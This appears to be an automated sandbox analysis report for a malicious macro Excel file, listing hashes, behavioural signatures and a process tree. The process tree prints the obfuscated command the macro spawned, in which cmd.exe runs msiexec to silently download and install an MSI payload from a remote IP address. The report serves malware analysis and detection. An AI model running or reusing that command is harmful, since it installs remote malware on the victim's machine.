Analysis
-
max time kernel
62s -
max time network
64s -
platform
windows7_x64 -
resource
win7 -
submitted
30-06-2020 17:58
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
Resource
win7
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
Resource
win10v200430
General
-
Target
SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
-
Size
172KB
-
MD5
ac016bd363b76505c4b5f55fa92bf343
-
SHA1
245a98cac3ab0bb615aa265c2774e34c1fcf2bd3
-
SHA256
95bd7a62ced0c80358c8e3fd12bb8acb9aecea2b35fa43e7a343cb38ae233e5f
-
SHA512
812ed62c7379e690f3e9af0cde79d1e38e5ed0971f98f0662584ea885e03bc8b36e31dfc7c54a2be2f5989605ff59e6d53a4e4b7f875fff0f8ac9dc40bdbb7c2
Malware Config
Signatures
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1196 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1500 1196 cmd.exe EXCEL.EXE -
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 908 msiexec.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 1196 EXCEL.EXE 1196 EXCEL.EXE 1196 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 1196 wrote to memory of 1500 1196 EXCEL.EXE cmd.exe PID 1196 wrote to memory of 1500 1196 EXCEL.EXE cmd.exe PID 1196 wrote to memory of 1500 1196 EXCEL.EXE cmd.exe PID 1500 wrote to memory of 908 1500 cmd.exe msiexec.exe PID 1500 wrote to memory of 908 1500 cmd.exe msiexec.exe PID 1500 wrote to memory of 908 1500 cmd.exe msiexec.exe PID 1500 wrote to memory of 908 1500 cmd.exe msiexec.exe PID 1500 wrote to memory of 908 1500 cmd.exe msiexec.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
msiexec.exepid process 908 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 908 msiexec.exe Token: SeIncreaseQuotaPrivilege 908 msiexec.exe Token: SeRestorePrivilege 640 msiexec.exe Token: SeTakeOwnershipPrivilege 640 msiexec.exe Token: SeSecurityPrivilege 640 msiexec.exe Token: SeCreateTokenPrivilege 908 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 908 msiexec.exe Token: SeLockMemoryPrivilege 908 msiexec.exe Token: SeIncreaseQuotaPrivilege 908 msiexec.exe Token: SeMachineAccountPrivilege 908 msiexec.exe Token: SeTcbPrivilege 908 msiexec.exe Token: SeSecurityPrivilege 908 msiexec.exe Token: SeTakeOwnershipPrivilege 908 msiexec.exe Token: SeLoadDriverPrivilege 908 msiexec.exe Token: SeSystemProfilePrivilege 908 msiexec.exe Token: SeSystemtimePrivilege 908 msiexec.exe Token: SeProfSingleProcessPrivilege 908 msiexec.exe Token: SeIncBasePriorityPrivilege 908 msiexec.exe Token: SeCreatePagefilePrivilege 908 msiexec.exe Token: SeCreatePermanentPrivilege 908 msiexec.exe Token: SeBackupPrivilege 908 msiexec.exe Token: SeRestorePrivilege 908 msiexec.exe Token: SeShutdownPrivilege 908 msiexec.exe Token: SeDebugPrivilege 908 msiexec.exe Token: SeAuditPrivilege 908 msiexec.exe Token: SeSystemEnvironmentPrivilege 908 msiexec.exe Token: SeChangeNotifyPrivilege 908 msiexec.exe Token: SeRemoteShutdownPrivilege 908 msiexec.exe Token: SeUndockPrivilege 908 msiexec.exe Token: SeSyncAgentPrivilege 908 msiexec.exe Token: SeEnableDelegationPrivilege 908 msiexec.exe Token: SeManageVolumePrivilege 908 msiexec.exe Token: SeImpersonatePrivilege 908 msiexec.exe Token: SeCreateGlobalPrivilege 908 msiexec.exe -
Blacklisted process makes network request 1 IoCs
Processes:
msiexec.exeflow pid process 3 640 msiexec.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/new-order0456.msi /qn2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msiexec.exemsiExec /i http://199.195.250.60/gg/new-order0456.msi /qn3⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/908-3-0x0000000000000000-mapping.dmp
-
memory/908-4-0x0000000002320000-0x0000000002324000-memory.dmpFilesize
16KB
-
memory/1196-0-0x0000000006180000-0x0000000006280000-memory.dmpFilesize
1024KB
-
memory/1196-1-0x0000000006180000-0x0000000006280000-memory.dmpFilesize
1024KB
-
memory/1500-2-0x0000000000000000-mapping.dmp